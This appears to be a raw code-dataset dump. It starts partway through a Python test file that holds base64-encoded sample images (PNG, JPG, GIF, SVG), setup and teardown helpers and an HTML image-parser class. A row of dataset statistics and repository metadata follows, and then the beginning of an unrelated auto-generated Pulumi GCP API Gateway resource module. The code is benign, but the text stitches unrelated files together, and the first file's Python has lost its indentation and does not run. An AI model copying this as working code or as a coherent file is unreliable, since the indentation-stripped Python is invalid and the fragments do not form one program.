9LyODnKxz/5QIqq+DTU6Bo2FA0PXWD71Amxn5sSwKevhr6vHFzw/pERK1uFtz4FUaNkCDAw0l4M3woC7Nn2fskbDljIhHc/Dx+8DQ+S5GwtV40Vbhozib8eYECWl3IOiMp0TSol7KGGTdatGjOYpk37NqRAAAjIvBugPzqAX2warJw0bFyREahoBANDRQgjlKJ5QnyqysUmK1Dfzfh0pJqhM3AdB0ys1Ghx71a1NejsREPH6KmBiWlKD5j26ugF0PYEESF4ruTMqt7eiBtM0KmiL4hvQDpBTwCWhgyjkiYY1GGQcHIS7WVr/NSPpwbPFD0lqeZvBWOs/sxuKd12qNobwIcHBAfZ2mSoEBkZmCjTn4G785IWYjL2XBxaWcCAPTri08+sjRJt25YNB+GLKQsRB9XCf2+NgbHt+OPY9DFQeNj2dFjydPRVtkJi+XftxqTPmyp4pW/oB0lWmr+09GPMRpRoUeFHhcvocKACwZU3QIAf294ucPTHf69oPGBWgWfnlAqrTaSFPw/YU7CFEAogAIIBVAAoQAKIBRAAYQCKIBQAAUQCqAAQgEUQCiAAggFUAChAAogFEABhAIogFAABRAKoABCARRAKIACCAVQAKEACiAUQAGEAiiAUAAFEAqwef4DInGMjs/cGPUAAAAASUVORK5CYII='
jpg_b64_image = b'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'
gif_b64_image = b'R0lGODlhgACAAMZiAAAp/w0t/xYw/xwz/yY5/yo8/y4//zVD/zhG/z1K/0BM/0JO/0VQ/0dS/0tV/1Nb/1Zf/1xj/2Nq/2lv/21z/251/3h9/3p//3yB/36C/4CF/4KH/4SJ/4WK/4mN/4uP/4yQ/42R/4+T/5GU/5KV/5SX/5SY/5WZ/5ib/5mc/52g/5+i/6ir/6mr/66w/7Cy/7Gz/7K0/7O1/7W3/7a4/72+/77A/8DC/8HD/8XH/8nK/8vN/83O/8/Q/9HS/9LT/9XW/9fY/9na/9ra/9rb/9zd/93e/9/g/+Dh/+Hi/+Tl/+jp/+np/+nq/+vr/+3t/+7u/+7v/+/v//Dx//Hx//Hy//T0//X1//b2//f3//f4//j4//n5//r6//v8//z8//39//7+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////yH5BAEKAH8ALAAAAACAAIAAAAf+gGKCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3uu19HNSkWDwgCCRAUJDE8Uu9NWCgAQLCgQYMSXDBB1OVgQS+GGjqcOJHDLisqAlDcSHDDIYkOIRYCyZGixVxDGpTkaOAjRZGESK48ePKWDgEzN7aM+JJnToc1a/nQ+HPizpE9kRY1GHSWkwMbE7D48QQLmCxRjtgwAZXg0ZhJwS4t2FTWBooBZmhRxKVHBwD+XwfJfOgz5DAhFA0QeXQkhMuJMOWGBfaBIo9McwkGFpQYwOJeV3A6/KCp8WPLwn5QNFJ5MGPPvWBMTACmM+C6Bx/zMjFRxCbMSscysIVhIovXoBuvnF2rwsQZiG6snBI7NeqivGn5dkgj+PDiBi+PJZh81oWJLZyXJC7WLvSf1WWVmDhCO0fugk9/zxk+1ouJDMIcEr59vePjdINpnpiEkYyJ6H2mXnfGBWOFZAed4B+A9kk3IDAeUBTEIv85FKAYsBEY3TBBULSAEopUeNCFGabnXTBhZJBXDl8gIqJBJOYGmi9LFLBRBDMUUUUXYGDxhA8aMKhhfkMqVswO0wmMaWKBRd5XDA5JjtggfkYa4wMCURJExZRcGgMFCNMNgAISVDrZpGrDHIECATMN0MENW/514pIbLrMFEDGAMMECBBDggAQXrGCDEFksUqKAc76j6KKMNuroo5BGKumklFZq6aWYZqrpppx26umnoIYq6qiklmrqqaimquqqrLbq6quwxirrrLTWaustgQAAOw=='
svg_b64_image = b'PHN2ZyB3aWR0aD0iMTY2LjM0ODgwMzcxMDkzNzVweCIgaGVpZ2h0PSIxMjIuMDIxMjQwMjM0Mzc1cHgiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmlld0JveD0iMTY2LjgyNTU5ODE0NDUzMTI2IDEzLjk4OTM3OTg4MjgxMjUgMTY2LjM0ODgwMzcxMDkzNzUgMTIyLjAyMTI0MDIzNDM3NSIgc3R5bGU9ImJhY2tncm91bmQ6IHJnYmEoMCwgMCwgMCwgMCk7IiBwcmVzZXJ2ZUFzcGVjdFJhdGlvPSJ4TWlkWU1pZCI+PGRlZnM+PGZpbHRlciBpZD0iZWRpdGluZy1ob2xlIiB4PSItMTAwJSIgeT0iLTEwMCUiIHdpZHRoPSIzMDAlIiBoZWlnaHQ9IjMwMCUiPjxmZUZsb29kIGZsb29kLWNvbG9yPSIjMDAwIiByZXN1bHQ9ImJsYWNrIj48L2ZlRmxvb2Q+PGZlTW9ycGhvbG9neSBvcGVyYXRvcj0iZGlsYXRlIiByYWRpdXM9IjIiIGluPSJTb3VyY2VHcmFwaGljIiByZXN1bHQ9ImVyb2RlIj48L2ZlTW9ycGhvbG9neT48ZmVHYXVzc2lhbkJsdXIgaW49ImVyb2RlIiBzdGREZXZpYXRpb249IjQiIHJlc3VsdD0iYmx1ciI+PC9mZUdhdXNzaWFuQmx1cj48ZmVPZmZzZXQgaW49ImJsdXIiIGR4PSIyIiBkeT0iMiIgcmVzdWx0PSJvZmZzZXQiPjwvZmVPZmZzZXQ+PGZlQ29tcG9zaXRlIG9wZXJhdG9yPSJhdG9wIiBpbj0ib2Zmc2V0IiBpbjI9ImJsYWNrIiByZXN1bHQ9Im1lcmdlIj48L2ZlQ29tcG9zaXRlPjxmZUNvbXBvc2l0ZSBvcGVyYXRvcj0iaW4iIGluPSJtZXJnZSIgaW4yPSJTb3VyY2VHcmFwaGljIiByZXN1bHQ9ImlubmVyLXNoYWRvdyI+PC9mZUNvbXBvc2l0ZT48L2ZpbHRlcj48L2RlZnM+PGcgZmlsdGVyPSJ1cmwoI2VkaXRpbmctaG9sZSkiPjxnIHRyYW5zZm9ybT0idHJhbnNsYXRlKDE5Ny40MDIxOTA2ODUyNzIyMiwgOTguMzUyMTg2MjAzMDAyOTMpIj48cGF0aCBkPSJNMjAuMjItMjIuNDZMMjAuMjItMjIuNDZMMjAuMjItMjIuNDZRMjEuMTItMjQuODMgMjEuMTItMjYuODhMMjEuMTItMjYuODhMMjEuMTItMjYuODhRMjEuMTItMzAuNjYgMTguMDUtMzAuNjZMMTguMDUtMzAuNjZMMTguMDUtMzAuNjZRMTYuNDUtMzAuNjYgMTUuMTQtMjkuMjJMMTUuMTQtMjkuMjJMMTUuMTQtMjkuMjJRMTMuODItMjcuNzggMTMuODItMjUuOThMMTMuODItMjUuOThMMTMuODItMjUuOThRMTMuODItMjQuNzAgMTQuODUtMjMuNjhMMTQuODUtMjMuNjhMMTQuODUtMjMuNjhRMTYuMzItMjIuMjcgMjAuMTAtMTkuOTdMMjAuMTAtMTkuOTdMMjAuMTAtMTkuOTdRMjMuODctMTcuNjYgMjUuMzEtMTUuNzhMMjUuMzEtMTUuNzhMMjUuMzEtMTUuNzhRMjYuNzUtMTMuODkgMjYuNzUtMTEuMzBMMjYuNzUtMTEuMzBMMjYuNzUtMTEuMzBRMjYuNzUtOC43MCAyNS41MC02LjM0TDI1LjUwLTYuMzRMMjUuNTAtNi4zNFEyNC4yNi0zLjk3IDIyLjAyLTIuMzBMMjIuMDItMi4zMEwyMi4wMi0yLjMwUTE3LjIyIDEuMjggOS41NCAxLjI4TDkuNTQgMS4yOEw5LjU0IDEuMjhRNS4zOCAxLjI4IDIuMTgtMC45MEwyLjE4LTAuOTBMMi4xOC0wLjkwUS0xLjAyLTMuMDEtMS4wMi01LjUwTC0xLjAyLTUuNTBMLTEuMDItNS41MFEtMS4wMi04IDAuODAtOS40N0wwLjgwLTkuNDdMMC44MC05LjQ3UTIuNjItMTAuOTQgNS4zMS0xMC45NEw1LjMxLTEwLjk0TDUuMzEtMTAuOTRROC0xMC45NCA5LjY2LTkuOTJMOS42Ni05LjkyTDkuNjYtOS45MlE4LjgzLTcuODEgOC44My02LjQwTDguODMtNi40MEw4LjgzLTYuNDBROC44My0yLjE4IDEyLjQyLTIuMThMMTIuNDItMi4xOEwxMi40Mi0yLjE4UTEzLjk1LTIuMTggMTQuOTgtMy4xNEwxNC45OC0zLjE0TDE0Ljk4LTMuMTRRMTYtNC4xMCAxNi01Ljc2TDE2LTUuNzZMMTYtNS43NlExNi05LjAyIDEwLjUwLTEyLjQ4TDEwLjUwLTEyLjQ4TDEwLjUwLTEyLjQ4UTYuMDItMTUuNDIgNC45OS0xNi41OEw0Ljk5LTE2LjU4TDQuOTktMTYuNThRMy4yNi0xOC42MiAzLjI2LTIxLjE4TDMuMjYtMjEuMThMMy4yNi0yMS4xOFEzLjI2LTIzLjc0IDQuNDgtMjYuMThMNC40OC0yNi4xOEw0LjQ4LTI2LjE4UTUuNzAtMjguNjEgNy45NC0zMC4zNEw3Ljk0LTMwLjM0TDcuOTQtMzAuMzRRMTIuNjEtMzMuOTIgMjAuNzQtMzMuOTJMMjAuNzQtMzMuOTJMMjAuNzQtMzMuOTJRMjQuOTAtMzMuOTIgMjcuMzYtMzIuMjZMMjcuMzYtMzIuMjZMMjcuMzYtMzIuMjZRMjkuODItMzAuNTkgMjkuODItMjcuNzhMMjkuODItMjcuNzhMMjkuODItMjcuNzhRMjkuODItMjQuOTYgMjguMTMtMjMuMzZMMjguMTMtMjMuMzZMMjguMTMtMjMuMzZRMjYuNDMtMjEuNzYgMjMuMzYtMjEuNzZMMjMuMzYtMjEuNzZMMjMuMzYtMjEuNzZRMjEuMjUtMjEuNzYgMjAuMjItMjIuNDZaTTU1LjQyLTMxLjU1TDU1LjQyLTMxLjU1TDU1LjQyLTMxLjU1UTU3LjU0LTMzLjkyIDYxLjE4LTMzLjkyTDYxLjE4LTMzLjkyTDYxLjE4LTMzLjkyUTYzLjQyLTMzLjkyIDY1LjE1LTMyLjcwTDY1LjE1LTMyLjcwTDY1LjE1LTMyLjcwUTY2Ljg4LTMxLjQ5IDY2Ljg4LTI5LjIyTDY2Ljg4LTI5LjIyTDY2Ljg4LTI5LjIyUTY2Ljg4LTI2Ljk0IDY2LjE4LTI0LjUxTDY2LjE4LTI0LjUxTDY2LjE4LTI0LjUxUTY1LjQ3LTIyLjA4IDY0LjM4LTE5LjU4TDY0LjM4LTE5LjU4TDY0LjM4LTE5LjU4UTYyLjIxLTE0LjcyIDU5LjIwLTEwLjY5TDU5LjIwLTEwLjY5TDU5LjIwLTEwLjY5UTU0Ljk4LTQuODYgNTAuOTEtMS43OUw1MC45MS0xLjc5TDUwLjkxLTEuNzlRNDYuODUgMS4yOCA0Mi40MyAxLjI4TDQyLjQzIDEuMjhMNDIuNDMgMS4yOFEzOC44NSAxLjI4IDM2LjY3IDAuNDVMMzYuNjcgMC40NUwzNi42NyAwLjQ1UTM2LjI5LTEyLjk5IDM1LjgxLTE3Ljc5TDM1LjgxLTE3Ljc5TDM1LjgxLTE3Ljc5UTM1LjMzLTIyLjU5IDM0Ljk0LTI1LjIyTDM0Ljk0LTI1LjIyTDM0Ljk0LTI1LjIyUTM0LjMwLTMwLjM0IDMyLjM4LTMxLjU1TDMyLjM4LTMxLjU1TDMyLjM4LTMxLjU1UTMzLjg2LTMyLjgzIDM1LjMwLTMzLjM4TDM1LjMwLTMzLjM4TDM1LjMwLTMzLjM4UTM2Ljc0LTMzLjkyIDM5LjcxLTMzLjkyTDM5LjcxLTMzLjkyTDM5LjcxLTMzLjkyUTQyLjY5LTMzLjkyIDQ0LjgwLTMxLjU4TDQ0LjgwLTMxLjU4TDQ0LjgwLTMxLjU4UTQ2LjkxLTI5LjI1IDQ3LjMzLTI1LjEyTDQ3LjMzLTI1LjEyTDQ3LjMzLTI1LjEyUTQ3Ljc0LTIwLjk5IDQ3Ljc0LTE2TDQ3Ljc0LTE2TDQ3Ljc0LTE2UTQ3Ljc0LTExLjAxIDQ3LjM2LTQuOTlMNDcuMzYtNC45OUw0Ny4zNi00Ljk5UTQ5LjM0LTYuNDAgNTEuNDYtMTAuNjlMNTEuNDYtMTAuNjlMNTEuNDYtMTAuNjlRNTQuMzQtMTYuNjQgNTUuMzYtMjMuODFMNTUuMzYtMjMuODFMNTUuMzYtMjMuODFRNTUuNjgtMjUuOTggNTUuNjgtMjguMjlMNTUuNjgtMjguMjlMNTUuNjgtMjguMjlRNTUuNjgtMzAuNTkgNTUuNDItMzEuNTVaTTczLjE1LTI2Ljc1TDczLjE1LTI2Ljc1TDczLjE1LTI2Ljc1UTc1LjMzLTI5LjgyIDc4LjYyLTMxLjg3TDc4LjYyLTMxLjg3TDc4LjYyLTMxLjg3UTgxLjkyLTMzLjkyIDg1Ljk1LTMzLjkyTDg1Ljk1LTMzLjkyTDg1Ljk1LTMzLjkyUTg5Ljk4LTMzLjkyIDkxLjkwLTMyLjY0TDkxLjkwLTMyLjY0TDEwNC40NS0zMy45MkwxMDAuMTAtOS4zNEwxMDAuMTAtOS4zNFE5Ny44NiAzLjIwIDkzLjEyIDguMTNMOTMuMTIgOC4xM0w5My4xMiA4LjEzUTg4LjU4IDEyLjgwIDc5Ljc0IDEyLjgwTDc5Ljc0IDEyLjgwTDc5Ljc0IDEyLjgwUTczLjAyIDEyLjgwIDY5LjE4IDEwLjY5TDY5LjE4IDEwLjY5TDY5LjE4IDEwLjY5UTY1LjM0IDguNTggNjUuMzQgNS4wNkw2NS4zNCA1LjA2TDY1LjM0IDUuMDZRNjUuMzQgMi40MyA2Ny4zMyAwLjkzTDY3LjMzIDAuOTNMNjcuMzMgMC45M1E2OS4zMS0wLjU4IDcyLjM4LTAuNThMNzIuMzgtMC41OEw3Mi4zOC0wLjU4UTc1LjA3LTAuNTggNzcuMTIgMC42NEw3Ny4xMiAwLjY0TDc3LjEyIDAuNjRRNzguMzQgMS4yOCA3OC45MSAyLjE4TDc4LjkxIDIuMThMNzguOTEgMi4xOFE3Ny40NCAzLjQ2IDc3LjQ0IDUuNTdMNzcuNDQgNS41N0w3Ny40NCA1LjU3UTc3LjQ0IDguMzIgODAuMDAgOC4zMkw4MC4wMCA4LjMyTDgwLjAwIDguMzJRODQuMjkgOC4zMiA4Ni43Mi0xLjc5TDg2LjcyLTEuNzlMODYuNzItMS43OVE4Ny40Mi00LjU0IDg4LjAwLTcuMzBMODguMDAtNy4zMEw4OC4wMC03LjMwUTg1LjEyLTMuNzggNzguNTktMy43OEw3OC41OS0zLjc4TDc4LjU5LTMuNzhRNzQuMDUtMy43OCA3MS40Mi01Ljk1TDcxLjQyLTUuOTVMNzEuNDItNS45NVE2OC44MC04LjEzIDY4LjgwLTEzLjI1TDY4LjgwLTEzLjI1TDY4LjgwLTEzLjI1UTY4LjgwLTE2LjQ1IDY5Ljg5LTIwLjA2TDY5Ljg5LTIwLjA2TDY5Ljg5LTIwLjA2UTcwLjk4LTIzLjY4IDczLjE1LTI2Ljc1Wk04MS40Ny0xMy4wNkw4MS40Ny0xMy4wNkw4MS40Ny0xMy4wNlE4MS40Ny04LjcwIDgzLjcxLTguNzBMODMuNzEtOC43MEw4My43MS04LjcwUTg1LjI1LTguNzAgODYuNzItMTAuMzdMODYuNzItMTAuMzdMODYuNzItMTAuMzdRODcuODctMTEuNzEgODguMzItMTMuNzBMODguMzItMTMuNzBMOTEuNTgtMzAuMTRMOTEuNTgtMzAuMTRROTEuMjYtMzAuMjEgOTAuOTQtMzAuMzRMOTAuOTQtMzAuMzRMOTAuOTQtMzAuMzRROTAuMzAtMzAuNTkgODkuNDctMzAuNTlMODkuNDctMzAuNTlMODkuNDctMzAuNTlRODUuNTctMzAuNTkgODMuMjYtMjQuMTlMODMuMjYtMjQuMTlMODMuMjYtMjQuMTlRODEuNDctMTkuMjAgODEuNDctMTMuMDZaIiBmaWxsPSIjY2NjIj48L3BhdGg+PC9nPjwvZz48c3R5bGU+dGV4dCB7CiAgZm9udC1zaXplOiA2NHB4OwogIGZvbnQtZmFtaWx5OiBBcmlhbCBCbGFjazsKICBkb21pbmFudC1iYXNlbGluZTogY2VudHJhbDsKICB0ZXh0LWFuY2hvcjogbWlkZGxlOwp9PC9zdHlsZT48L3N2Zz4='
def setup_method(self, method):
self.temp_dir = tempfile.mkdtemp()
def teardown_method(self, method):
if os.path.exists(self.temp_dir) and self.temp_dir != '/tmp':
rmtree(self.temp_dir)
self.temp_dir = '/tmp'
def build_zpt(self):
zptfile = Path(self.temp_dir) / 'test.zpt'
result = ReportFileBuilder.build_file(RPT_FILTER_EXAMPLE_PATH, zptfile)
assert result.success() is True
zpt = ReportFileLoader.load_file(zptfile)
assert zpt is not None
return zpt
class ImageParser(HTMLParser):
def reset(self):
super().reset()
self._images = []
def handle_starttag(self, tag, attrs):
if tag == 'img':
self._images.append(attrs)
def get_images(self) -> list:
result = []
for img in self._images:
data = {}
for attr in img:
data[attr[0]] = attr[1]
result.append(data)
return result
| 291.418182 | 6,431 | 0.937609 | 492 | 16,028 | 30.481707 | 0.78252 | 0.003267 | 0.004401 | 0.002667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110706 | 0.024457 | 16,028 | 54 | 6,432 | 296.814815 | 0.848427 | 0.002308 | 0 | 0 | 0 | 0.073171 | 0.915317 | 0.913878 | 0 | 1 | 0 | 0 | 0.04878 | 1 | 0.146341 | false | 0 | 0.170732 | 0 | 0.536585 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
7ae5bda6078cdf279fd1b6d2b0b681ac2cee1df3 | 19,767 | py | Python | sdk/python/pulumi_gcp/apigateway/api.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/apigateway/api.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/apigateway/api.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ApiArgs', 'Api']
@pulumi.input_type
class ApiArgs:
def __init__(__self__, *,
api_id: pulumi.Input[str],
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Api resource.
:param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within scope of the parent resource(project)
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
:param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "api_id", api_id)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if managed_service is not None:
pulumi.set(__self__, "managed_service", managed_service)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="apiId")
def api_id(self) -> pulumi.Input[str]:
"""
Identifier to assign to the API. Must be unique within scope of the parent resource(project)
"""
return pulumi.get(self, "api_id")
@api_id.setter
def api_id(self, value: pulumi.Input[str]):
pulumi.set(self, "api_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-visible name for the API.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource labels to represent user-provided metadata.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="managedService")
def managed_service(self) -> Optional[pulumi.Input[str]]:
"""
Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
"""
